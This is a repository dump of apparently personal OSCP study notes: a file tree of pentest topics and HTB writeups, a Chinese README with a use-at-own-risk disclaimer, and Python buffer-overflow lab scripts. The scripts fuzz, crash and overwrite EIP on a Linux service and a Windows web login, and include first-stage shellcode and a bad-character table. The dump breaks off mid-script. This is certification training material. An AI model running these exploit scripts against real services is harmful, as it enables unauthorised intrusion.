├── 1.lin-basic.md ├── 1.win-basic.md ├── 2.BOF.md ├── 3-Recon.md ├── 4-WebAttack.md ├── 5-ExploitShell.md ├── 6-WinPrivesc.md ├── 6-linuxPrivesc.md ├── 7-ActiveDirectory.md ├── 8-CrackCipher.md ├── 9-AntiVirusEvasion.md ├── 9-PTframework.md ├── 9-PostExploitaion.md ├── MyKaliForOSCP.md ├── OSCPtips.md ├── README.md ├── images └── bof │ ├── 060ac035-6ab6-4d6e-8f0b-99549dca62e0.png │ ├── 08addaa6-49f3-4898-8c5e-22c7797a5810.png │ ├── 2e6b97d1-7ffd-4665-bd04-632446068550.png │ ├── 50739600-cfae-499d-aeec-ced91cbca891.png │ ├── 7fb801b6-e3e4-424b-9a59-530bf86ee35b.png │ ├── 892451e7-258e-40e3-8653-c700bfc995bd.png │ ├── a542645d-4b3a-4911-9608-635153837857.png │ ├── a845958d-96c6-43f9-ba57-c731a0bf7611.jpg │ ├── b50a906b-9604-442a-b036-24c219b29e23.png │ └── b91150aa-bd45-4650-bf8b-f6edc9704215.png ├── scripts ├── lbof │ ├── 1linfuzz.py │ ├── 3linshell.py │ └── lin4badchar.py └── wbof │ ├── 1fuzz.py │ ├── 2bof.py │ ├── 2checkeip.py │ ├── 2findeip.py │ ├── 3getspace.py │ ├── 4checkbad.py │ ├── 5jmpesp.py │ ├── 7getshell.py │ ├── Asxtomp3converter.exe │ └── asxbof.md └── writeup └── htb ├── ad-active.md ├── ad-acute.md ├── ad-blackfield.md ├── ad-cascade.md ├── ad-forest.md ├── ad-fuse-undone.md ├── ad-mantis.md ├── ad-multimaster.md ├── ad-reel.md ├── ad-resolute.md ├── ad-sauna.md ├── ad-search.md ├── ad-sizzle.md ├── arctic.md ├── backdoor.md ├── bastard.md ├── bastion.md ├── beep.md ├── blocky.md ├── bounty.md ├── cronos.md ├── grandpa.md ├── grany.md ├── haircut.md ├── images ├── image-20220924003553547.png ├── image-20220924003920650.png ├── image-20220924003942131.png ├── image-20220924004055582.png ├── image-20220924004920191.png ├── image-20220924023328429.png ├── image-20220924023516374.png ├── image-20220924111610114.png ├── image-20220924111653452.png ├── image-20220924111756441.png ├── image-20220924112503991.png ├── image-20220924114822827.png ├── image-20220924114845109.png ├── image-20220924135551542.png ├── image-20220924135724419.png ├── 
image-20220924140110004.png ├── image-20220924145101016.png ├── image-20220924213022784.png ├── image-20220924213129196.png ├── image-20220924223318677.png ├── image-20220924225201545.png ├── image-20220924225331597.png ├── image-20220924230012511.png ├── image-20220924231918553.png ├── image-20220924232030678.png ├── image-20220924232434035.png ├── image-20220924232651719.png ├── image-20220924234431829.png ├── image-20220925000556434.png ├── image-20220925000738783.png ├── image-20220925001713245.png ├── image-20220925122346440.png ├── image-20220925122415939.png ├── image-20220925122505424.png ├── image-20220925165643194.png ├── image-20220925165712610.png ├── image-20220925170320556.png ├── image-20220925215526409.png ├── image-20220925220208294.png ├── image-20220926003233263.png ├── image-20220926004034922.png ├── image-20220926004334048.png ├── image-20220926004644915.png ├── image-20220926004703546.png ├── image-20220926005432012.png ├── image-20220927232024252.png ├── image-20220927232227146.png ├── image-20220927233915858.png ├── image-20220927234107335.png ├── image-20220927234151996.png ├── image-20220927234329126.png ├── image-20220927234636946.png ├── image-20220927235650352.png ├── image-20220928000500497.png ├── image-20220928000606055.png ├── image-20220928000723438.png ├── image-20220928000830592.png ├── image-20220928003412499.png ├── image-20220928005101978.png ├── image-20220928005220754.png ├── image-20220928005253261.png ├── image-20220928005605071.png ├── image-20220928005638543.png ├── image-20220930004615767.png ├── image-20220930012103214.png ├── image-20220930012523794.png ├── image-20220930012741671.png ├── image-20220930013024861.png ├── image-20220930013232266.png ├── image-20220930013325454.png ├── image-20220930013429452.png ├── image-20220930013715278.png ├── image-20221001162204947.png ├── image-20221001162411187.png ├── image-20221001162533764.png ├── image-20221001162609463.png ├── image-20221001165000389.png ├── 
image-20221001171550775.png ├── image-20221001171833590.png ├── image-20221001195523812.png ├── image-20221001195556861.png ├── image-20221002123015649.png ├── image-20221002123304850.png ├── image-20221002132028430.png ├── image-20221002132043574.png ├── image-20221002132119311.png ├── image-20221004195553761.png ├── image-20221004213727118.png ├── image-20221004214310633.png ├── image-20221006093554574.png ├── image-20221006093753452.png ├── image-20221006095034174.png ├── image-20221006095350557.png ├── image-20221006095600056.png ├── image-20221006100105020.png ├── image-20221006100317587.png ├── image-20221006100504905.png ├── image-20221006101936191.png ├── image-20221006102120562.png ├── image-20221006102236093.png ├── image-20221006104203078.png ├── image-20221006104229465.png ├── image-20221006110324775.png ├── image-20221006110357218.png ├── image-20221006110543293.png ├── image-20221006111742224.png ├── image-20221006111810718.png ├── image-20221006112008277.png ├── image-20221007171306603.png ├── image-20221007181533451.png ├── image-20221007182006959.png ├── image-20221007201117065.png ├── image-20221007201304220.png ├── image-20221007212736856.png ├── image-20221007213524443.png ├── image-20221007213614208.png ├── image-20221008002220140.png ├── image-20221008002602444.png ├── image-20221008002641117.png ├── image-20221008110922287.png ├── image-20221008112527576.png ├── image-20221008112655101.png ├── image-20221008112955288.png ├── image-20221012230724543.png ├── image-20221012231019955.png ├── image-20221012231232025.png ├── image-20221012231301508.png ├── image-20221012231553404.png ├── image-20221012231624888.png ├── image-20221012235108624.png ├── image-20221012235146971.png ├── image-20221013003445631.png ├── image-20221014204641857.png ├── image-20221014204820582.png ├── image-20221014204853312.png ├── image-20221014204933506.png ├── image-20221014205008635.png ├── image-20221014205330602.png ├── image-20221014205604726.png ├── 
image-20221014205657665.png ├── image-20221014205750324.png ├── image-20221014210220901.png ├── image-20221014210304608.png ├── image-20221014210354910.png ├── image-20221014212636936.png ├── image-20221014213254491.png ├── image-20221014232739154.png ├── image-20221014233140573.png ├── image-20221014233235151.png ├── image-20221014233328570.png ├── image-20221014233500066.png ├── image-20221015001336291.png ├── image-20221015003051835.png ├── image-20221015004124911.png ├── image-20221015004549489.png ├── image-20221015005808587.png ├── image-20221015020346788.png ├── image-20221015203052658.png ├── image-20221015203324402.png ├── image-20221015220218847.png ├── image-20221015220233157.png ├── image-20221015220314184.png ├── image-20221015220543473.png ├── image-20221015224440003.png ├── image-20221015224716688.png ├── image-20221015224917138.png ├── image-20221015224927312.png ├── image-20221016165913183.png ├── image-20221016212227916.png ├── image-20221016212607105.png ├── image-20221016212656112.png ├── image-20221016212756348.png ├── image-20221016212903401.png ├── image-20221016213009448.png ├── image-20221016213128514.png ├── image-20221016213155270.png ├── image-20221016213307543.png ├── image-20221016231751733.png ├── image-20221016232408996.png ├── image-20221019233349212.png ├── image-20221019233641637.png ├── image-20221020001715736.png ├── image-20221020232559806.png ├── image-20221020233246696.png ├── image-20221022192529141.png ├── image-20221022195149260.png ├── image-20221022211626522.png ├── image-20221022214822699.png ├── image-20221022215059624.png ├── image-20221022215706246.png ├── image-20221022220033432.png ├── image-20221023213218524.png ├── image-20221023213321474.png ├── image-20221023214425043.png ├── image-20221023214451200.png ├── image-20221023220607596.png ├── image-20221023220903026.png ├── image-20221023222050919.png ├── image-20221026102645013.png ├── image-20221026102740570.png ├── image-20221026104208164.png ├── 
image-20221026104731079.png ├── image-20221026112342335.png ├── image-20221026112352309.png ├── image-20221026113259137.png ├── image-20221026113315169.png ├── image-20221029162415893.png ├── image-20221029162802274.png ├── image-20221029234704932.png ├── image-20221029234839354.png ├── image-20221029235026968.png ├── image-20221030000055151.png ├── image-20221030000122307.png ├── image-20221030135016193.png ├── image-20221030145756089.png ├── image-20221030145827252.png ├── image-20221030150043257.png ├── image-20221030152347622.png ├── image-20221030153022130.png ├── image-20221030222755219.png ├── image-20221030224611029.png ├── image-20221030231830444.png ├── image-20221030231901698.png ├── image-20221030231933093.png ├── image-20221030231958267.png ├── image-20221030232836511.png ├── image-20221101222750743.png ├── image-20221102150553379.png ├── image-20221102150824792.png ├── image-20221102181423673.png ├── image-20221103142200083.png ├── image-20221103160625513.png ├── image-20221103192656734.png ├── image-20221103222137256.png ├── image-20221103222328205.png ├── image-20221103223202405.png ├── image-20221104174206387.png ├── image-20221105160904060.png ├── image-20221105161024761.png ├── image-20221105161332606.png ├── image-20221107232016785.png ├── image-20221107232245136.png ├── image-20221107232356016.png ├── image-20221107232645003.png ├── image-20221113230525991.png ├── image-20221114013406196.png ├── image-20221114224352632.png ├── image-20221117234112024.png ├── image-20221118000118552.png ├── image-20221119235835763.png ├── image-20221120000036912.png ├── image-20221120001002397.png ├── image-20221120181723981.png ├── image-20221120182156748.png ├── image-20221121130101314.png ├── image-20221121131555110.png ├── image-20221121131845625.png ├── image-20221121132151217.png ├── image-20221121132256126.png ├── image-20221121132527920.png ├── image-20221121224741518.png ├── image-20221203193519877.png ├── image-20221204000508554.png ├── 
image-20221204001746613.png ├── image-20221204005022847.png ├── image-20221204005959259.png ├── image-20221204143032712.png ├── image-20221204151422117.png ├── image-20221204151613080.png ├── image-20221204152258430.png ├── image-20221204160346658.png ├── image-20221204161402364.png ├── image-20221204161419478.png ├── image-20221204161656146.png ├── image-20221204202237848.png ├── image-20221204222846075.png ├── image-20221204224410764.png ├── image-20221204224502297.png ├── image-20221210153822720.png ├── image-20221211172535302.png ├── image-20221211174548056.png ├── image-20221211174828646.png ├── image-20221211175107117.png ├── image-20221211180250214.png ├── image-20221211180453371.png ├── image-20221211181806087.png ├── image-20221211215721891.png ├── image-20221211220746737.png ├── image-20221211222556421.png ├── image-20221211222934333.png ├── image-20221211223216266.png ├── image-20221212215552503.png ├── image-20221212215630948.png ├── image-20221212215740043.png ├── image-20221212220427820.png ├── image-20221212234746466.png ├── image-20221212234821129.png ├── image-20221212234958467.png ├── image-20221213000338744.png ├── image-20221213222443134.png ├── image-20221213232538919.png ├── image-20221213234723012.png ├── image-20221213234732346.png ├── image-20221214215056462.png ├── image-20221217132132421.png ├── image-20221217132146349.png ├── image-20221217132237171.png ├── image-20221217152615807.png ├── image-20221217183623913.png ├── image-20221217183708875.png ├── image-20221217194710260.png ├── image-20221217195936433.png ├── image-20221217201143838.png ├── image-20221217203017543.png ├── image-20221217204639782.png ├── image-20221217204750237.png ├── image-20221217204941487.png ├── image-20221217233026587.png ├── image-20221217233348166.png ├── image-20221217233407454.png ├── image-20221217233513787.png ├── image-20221218000413479.png ├── image-20221218001914482.png ├── image-20221218002102687.png ├── image-20221218002257117.png ├── 
image-20221218002529821.png ├── image-20221218002713803.png ├── image-20221218003936380.png ├── image-20221218004101982.png ├── image-20221218005051697.png ├── image-20221218005816443.png ├── image-20221218010135011.png ├── image-20221218010616203.png ├── image-20221218010704462.png ├── image-20221218011441551.png ├── image-20221218011511495.png ├── image-20221218013455692.png ├── image-20221218015119795.png ├── image-20221218015230358.png ├── image-20221218020332323.png ├── image-20221218020626320.png ├── image-20221218235308175.png ├── image-20221218235924771.png ├── image-20221219000007618.png ├── image-20221220185443194.png ├── image-20221220214501876.png ├── image-20221220214616026.png ├── image-20221221003949897.png ├── image-20221222010056608.png ├── image-20221222013543004.png ├── image-20221222075620527.png ├── image-20221224142534723.png ├── image-20221224153338063.png ├── image-20221224153350502.png ├── image-20221224153449875.png ├── image-20221225005712861.png ├── image-20221225012014922.png ├── image-20221225114018610.png ├── image-20221225141001716.png ├── image-20221225165920513.png ├── image-20221225213853706.png ├── image-20221225214200845.png ├── image-20221225222852128.png ├── image-20221225223120390.png ├── image-20221225223722876.png ├── image-20221225224911419.png ├── image-20221225225411688.png ├── image-20221225230315179.png ├── image-20221225232135606.png ├── image-20221225232318874.png ├── image-20221225233737188.png ├── image-20221226215718097.png ├── image-20221226220959511.png ├── image-20221227115516143.png ├── image-20221227140640517.png ├── image-20221230120329132.png ├── image-20221230163924357.png ├── image-20221230164033377.png ├── image-20221230164355050.png ├── image-20221230223413556.png ├── image-20221230223544586.png ├── image-20221230224359349.png ├── image-20221231181847992.png ├── image-20221231181923280.png ├── image-20221231181941276.png ├── image-20221231181957092.png ├── image-20221231182019393.png ├── 
image-20221231182312880.png ├── image-20221231192009774.png ├── image-20221231220249784.png ├── image-20221231224838236.png ├── image-20221231235035563.png ├── image-20230101001259320.png ├── image-20230102113250193.png ├── image-20230102173909090.png ├── image-20230102174047773.png ├── image-20230104210237774.png ├── image-20230104230329737.png ├── image-20230108121438918.png ├── image-20230108122014484.png ├── image-20230108122427516.png ├── image-20230108122652480.png ├── image-20230108122739342.png ├── image-20230108123148627.png ├── image-20230108123503157.png ├── image-20230108133806540.png ├── image-20230108133927982.png ├── image-20230108134045942.png ├── image-20230108141327838.png ├── image-20230108141359123.png ├── image-20230108141500217.png ├── image-20230108141552183.png ├── image-20230108142222299.png ├── image-20230108142332321.png ├── image-20230108145629319.png ├── image-20230109003307398.png ├── image-20230109205633588.png ├── image-20230111203620262.png ├── image-20230111235031104.png ├── image-20230113010029704.png ├── image-20230114181634168.png ├── image-20230114182213032.png ├── image-20230114182318507.png ├── image-20230115114612750.png ├── image-20230115114728175.png ├── image-20230115222124111.png ├── image-20230115234052808.png ├── image-20230119230529470.png ├── image-20230122121709541.png ├── image-20230122121835989.png ├── image-20230122121942401.png ├── image-20230124120247756.png ├── image-20230124120341960.png ├── image-20230124121515607.png └── image-20230124130830153.png ├── irked.md ├── jarvis.md ├── jeeves.md ├── love.md ├── mango.md ├── meta.md ├── mirai.md ├── networked.md ├── nibbles.md ├── nineveh.md ├── object.md ├── omni.md ├── pandora.md ├── paper.md ├── poison.md ├── popcorn.md ├── postman.md ├── remote.md ├── sense.md ├── setnotes.md ├── silo.md ├── sunday.md ├── support.md ├── swagshop.md ├── tartarsauce.md ├── template.md ├── valentine.md ├── worker.md └── writer.md /README.md: 
-------------------------------------------------------------------------------- 1 | # My-oscp-notes 2 | oscp notes and tips 3 | 4 | ## Content 5 | 6 | [My kali config for oscp(arm)](./MyKaliForOSCP.md) 7 | 8 | [OSCP tips](./OSCPtips.md) 9 | 10 | [lin-basic](./1.lin-basic.md) 11 | 12 | [win-basic](./1.win-basic.md) 13 | 14 | [BOF](./2.BOF.md) 15 | 16 | [Recon](./3-Recon.md) 17 | 18 | [WebAttack](./4-WebAttack.md) 19 | 20 | [ExploitShell](./5-ExploitShell.md) 21 | 22 | [WinPrivesc](./6-WinPrivesc.md) 23 | 24 | [linuxPrivesc](./6-linuxPrivesc.md) 25 | 26 | [ActiveDirectory](./7-ActiveDirectory.md) 27 | 28 | [CrackCipher](./8-CrackCipher.md) 29 | 30 | [AntiVirusEvasion](./9-AntiVirusEvasion.md) 31 | 32 | [PTframework](./9-PTframework.md) 33 | 34 | [PostExploitaion](./9-PostExploitaion.md) 35 | 36 | ***** 37 | 38 | ## 说明 39 | 1. 笔记为个人学习、认证过程中的记录,命令、说明来源于平时搜集学习的资料,使用前务必先验证,以免误导。 40 | 2. 笔记中部分技术点可能记录相关靶机,类似pg提示。 41 | 3. htb writeup 有些不太全,供参考。 42 | 4. tips 部分是他人的分享,部分是个人练习总结的经验。 43 | 44 | ****** 45 | 46 | **声明**:仅做技术分享与交流,他用后果自负。 47 | -------------------------------------------------------------------------------- /images/bof/060ac035-6ab6-4d6e-8f0b-99549dca62e0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/060ac035-6ab6-4d6e-8f0b-99549dca62e0.png -------------------------------------------------------------------------------- /images/bof/08addaa6-49f3-4898-8c5e-22c7797a5810.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/08addaa6-49f3-4898-8c5e-22c7797a5810.png -------------------------------------------------------------------------------- /images/bof/2e6b97d1-7ffd-4665-bd04-632446068550.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/2e6b97d1-7ffd-4665-bd04-632446068550.png -------------------------------------------------------------------------------- /images/bof/50739600-cfae-499d-aeec-ced91cbca891.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/50739600-cfae-499d-aeec-ced91cbca891.png -------------------------------------------------------------------------------- /images/bof/7fb801b6-e3e4-424b-9a59-530bf86ee35b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/7fb801b6-e3e4-424b-9a59-530bf86ee35b.png -------------------------------------------------------------------------------- /images/bof/892451e7-258e-40e3-8653-c700bfc995bd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/892451e7-258e-40e3-8653-c700bfc995bd.png -------------------------------------------------------------------------------- /images/bof/a542645d-4b3a-4911-9608-635153837857.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/a542645d-4b3a-4911-9608-635153837857.png -------------------------------------------------------------------------------- /images/bof/a845958d-96c6-43f9-ba57-c731a0bf7611.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/a845958d-96c6-43f9-ba57-c731a0bf7611.jpg 
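--------------------------------------------------------------------------------
/images/bof/b50a906b-9604-442a-b036-24c219b29e23.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/b50a906b-9604-442a-b036-24c219b29e23.png
--------------------------------------------------------------------------------
/images/bof/b91150aa-bd45-4650-bf8b-f6edc9704215.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/b91150aa-bd45-4650-bf8b-f6edc9704215.png
--------------------------------------------------------------------------------
/scripts/lbof/1linfuzz.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Linux BOF lab, step 1: deliver one oversized "setup sound" command to the
# service on TCP/13327 and watch for the crash in the debugger.
#
# Runs unchanged under Python 2 and 3: every payload piece is a bytes literal
# and print() is called as a function.
import socket
import sys

# Target; `./1linfuzz.py <ip>` overrides the lab default.
host = sys.argv[1] if len(sys.argv) > 1 else "192.168.196.44"
port = 13327

# Fuzz body. The commented-out 4379 equals padding + EIP + first stage in
# 3linshell.py (4368 + 4 + 7); an empty value sends just the framing, which
# is useful as a non-crashing baseline.
#crash = b"\x41" * 4379
crash = b""

# Framing the service expects around the data: a leading 0x11 byte, the
# command text, then "\x90\x00#". The 0x00 looks like a terminator (the
# bad-char script treats it as suspect), so keep the fuzz data in front of it.
buffer = b"\x11(setup sound " + crash + b"\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)  # never hang on a half-crashed service
try:
    print("[*]Sending evil buffer...")
    s.connect((host, port))
    try:
        print(s.recv(1024))  # banner, as the original printed it
    except socket.timeout:
        print("[!]No banner within 5s, sending anyway")
    s.sendall(buffer)  # send() may deliver only part of a large buffer
    print("[*]Payload Sent !")
except socket.error as exc:
    # Refused / timed out: the previous run most likely crashed the service.
    print("[-]Could not deliver payload: %s" % exc)
    sys.exit(1)
finally:
    s.close()
--------------------------------------------------------------------------------
/scripts/lbof/3linshell.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Linux BOF lab, step 3: overwrite EIP and place a first-stage jump right
# behind it. 4368 bytes of padding (the same figure lin4badchar.py uses)
# reach the saved return address.
#
# The original file ended with a stray quote character that made it a
# SyntaxError; that is fixed, and the script is now Python 2/3 neutral.
import socket
import sys

host = sys.argv[1] if len(sys.argv) > 1 else "192.168.196.44"
port = 13327

padding = b"\x41" * 4368
# Still the 0x42424242 marker from the EIP-control check. Replace it with the
# address that transfers execution into `firststage`; as committed, this
# script only reproduces the controlled crash, it does not deliver a shell.
eip = b"\x42\x42\x42\x42"
# x86: add eax, 0xc ; jmp eax ; nop ; nop  -- jumps 12 bytes past wherever
# EAX points. This assumes EAX points into our buffer at crash time (confirm
# in the debugger). Only the framing follows the stage in this file, so a
# second stage still has to be appended before this can do anything useful.
firststage = b"\x83\xc0\x0c\xff\xe0\x90\x90"
buffer = b"\x11(setup sound " + padding + eip + firststage + b"\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)  # never hang on a half-crashed service
try:
    print("[*]Sending evil buffer...")
    s.connect((host, port))
    try:
        print(s.recv(1024))  # banner
    except socket.timeout:
        print("[!]No banner within 5s, sending anyway")
    s.sendall(buffer)  # send() may deliver only part of a large buffer
    print("[*]Payload Sent !")
except socket.error as exc:
    print("[-]Could not deliver payload: %s" % exc)
    sys.exit(1)
finally:
    s.close()
--------------------------------------------------------------------------------
/scripts/lbof/lin4badchar.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Linux BOF lab, step 4: push every byte value 0x00-0xff through the
# vulnerable command and compare what lands in memory against this list to
# find the characters the service mangles or truncates on.
import socket
import sys

host = sys.argv[1] if len(sys.argv) > 1 else "192.168.196.44"
port = 13327

# All 256 values, 16 per row. Note the rotation: every row ENDS with its 0xN0
# byte (row 1 ends with 0x00, row 2 with 0x10, ...), so compare the memory
# dump against exactly this sequence, not against a plain ascending list.
# The last row used to begin with \xe1 (a duplicate of the row above), so
# 0xf1 was never tested; it now reads \xf1.
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x00"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x10"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x20"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x30"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x40"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x50"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x60"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x70"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x80"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\x90"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xa0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xb0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xc0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xd0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xe0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf0")

# A typo in the table silently invalidates the whole test, so refuse to run
# unless every byte value appears exactly once.
if len(badchars) != 256 or len(set(badchars)) != 256:
    sys.exit("[-]badchars must list every byte value 0x00-0xff exactly once")

# Bad-char list first, then enough "A" to keep EIP at the same offset (4368),
# then the EIP / post-EIP markers from the earlier steps.
crash = badchars + b"\x41" * (4368 - len(badchars)) + b"B" * 4 + b"C" * 7
# 0x00 is deliberately in the list, but the framing below also uses 0x00 as
# its terminator, so it is very likely bad and may stop the overflow outright:
# if the crash disappears, drop \x00 from the table first and re-run.
buffer = b"\x11(setup sound " + crash + b"\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)  # never hang on a half-crashed service
try:
    print("[*]Sending evil buffer...")
    s.connect((host, port))
    try:
        print(s.recv(1024))  # banner
    except socket.timeout:
        print("[!]No banner within 5s, sending anyway")
    s.sendall(buffer)  # send() may deliver only part of a large buffer
    print("[*]Payload Sent !")
except socket.error as exc:
    print("[-]Could not deliver payload: %s" % exc)
    sys.exit(1)
finally:
    s.close()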
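
--------------------------------------------------------------------------------
/scripts/wbof/1fuzz.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Windows web BOF lab, step 1: POST ever-larger "username" values to /login
# on the target (TCP/80) until the service stops answering. Watch the process
# in the debugger; the size printed just before "Could not connect!" is the
# first one that was not delivered, so the one before it crashed the service.
#
# Python 2/3 neutral: the request is assembled as bytes, print() is a function.
import socket
import time
import sys

# Target; `./1fuzz.py <ip>` overrides the lab default. Used for the TCP
# connection and for the Host/Referer headers so they always agree.
HOST = sys.argv[1] if len(sys.argv) > 1 else "192.168.196.10"
PORT = 80


def build_request(input_buffer):
    """Wrap ``input_buffer`` (bytes) in the login POST the target parses.

    The overflow is in the ``username`` field; Content-Length is computed
    from the actual body. Returns the full HTTP/1.1 request as bytes.
    """
    content = b"username=" + input_buffer + b"&password=A"
    headers = [
        "POST /login HTTP/1.1",
        "Host: " + HOST,
        # the original spelled this "User - Agent: Mozilla / 5.0 ..."; spaces
        # inside a header name are not valid HTTP
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language: en-US,en;q=0.5",
        "Referer: http://" + HOST + "/login",
        "Connection: close",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: " + str(len(content)),
        "",
        "",  # two empty entries -> the "\r\n\r\n" that ends the header block
    ]
    return "\r\n".join(headers).encode("ascii") + content


def send_request(request):
    """Deliver ``request`` on a fresh connection and always close it.

    Raises socket.error (OSError on Python 3) if the target is unreachable,
    which is the expected outcome once the service has crashed.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)  # do not hang on a half-dead service
    try:
        s.connect((HOST, PORT))
        s.sendall(request)  # send() may transmit only part of a large request
    finally:
        s.close()


size = 100
while size < 2000:
    print("\nSending evil buffer with %s bytes..." % size)
    try:
        send_request(build_request(b"A" * size))
    except socket.error as exc:
        # The original looped forever here and also reset `size` to 100 on
        # every pass, so the buffer never grew and the loop never ended. A
        # failed connection means the previous buffer crashed the service:
        # report it and stop.
        print("Could not connect!")
        print("[-] %s" % exc)
        sys.exit(1)
    size += 100
    time.sleep(10)  # leave time to inspect the process in the debugger
--------------------------------------------------------------------------------
/scripts/wbof/2bof.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Windows web BOF lab, step 2: reproduce the crash found by 1fuzz.py with a
# single fixed-size buffer so it can be examined in the debugger.
import socket
import time
import sys

HOST = sys.argv[1] if len(sys.argv) > 1 else "192.168.196.10"
PORT = 80


def build_request(input_buffer):
    """Wrap ``input_buffer`` (bytes) in the login POST the target parses.

    The overflow is in the ``username`` field; Content-Length is computed
    from the actual body. Returns the full HTTP/1.1 request as bytes.
    """
    content = b"username=" + input_buffer + b"&password=A"
    headers = [
        "POST /login HTTP/1.1",
        "Host: " + HOST,
        # the original spelled this "User - Agent: Mozilla / 5.0 ..."; spaces
        # inside a header name are not valid HTTP
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language: en-US,en;q=0.5",
        "Referer: http://" + HOST + "/login",
        "Connection: close",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: " + str(len(content)),
        "",
        "",
    ]
    return "\r\n".join(headers).encode("ascii") + content


def send_request(request):
    """Deliver ``request`` on a fresh connection and always close it.

    Raises socket.error (OSError on Python 3) if the target is unreachable.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    try:
        s.connect((HOST, PORT))
        s.sendall(request)  # send() may transmit only part of a large request
    finally:
        s.close()


# 800 bytes: the crash size carried over from the fuzzing step (the original
# assigned size = 100 first and then overwrote it; the dead assignment is gone).
size = 800
print("\nSending evil buffer ")
try:
    send_request(build_request(b"A" * size))
except socket.error as exc:
    # Only connection problems are caught; programming errors now surface
    # instead of being reported as a connection failure.
    print("Could not connect!")
    print("[-] %s" % exc)
    sys.exit(1)
print("\nDone!")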
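--------------------------------------------------------------------------------
/scripts/wbof/2checkeip.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Windows web BOF lab, step 2b: confirm the EIP offset. With 780 bytes of
# padding (the offset 2findeip.py produced) the four "B" bytes should show up
# in EIP as 0x42424242; the trailing "C" bytes mark what lands just past the
# overwritten return address.
import socket
import time
import sys

HOST = sys.argv[1] if len(sys.argv) > 1 else "192.168.196.10"
PORT = 80


def build_request(input_buffer):
    """Wrap ``input_buffer`` (bytes) in the login POST the target parses.

    The overflow is in the ``username`` field; Content-Length is computed
    from the actual body. Returns the full HTTP/1.1 request as bytes.
    """
    content = b"username=" + input_buffer + b"&password=A"
    headers = [
        "POST /login HTTP/1.1",
        "Host: " + HOST,
        # the original spelled this "User - Agent: Mozilla / 5.0 ..."; spaces
        # inside a header name are not valid HTTP
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
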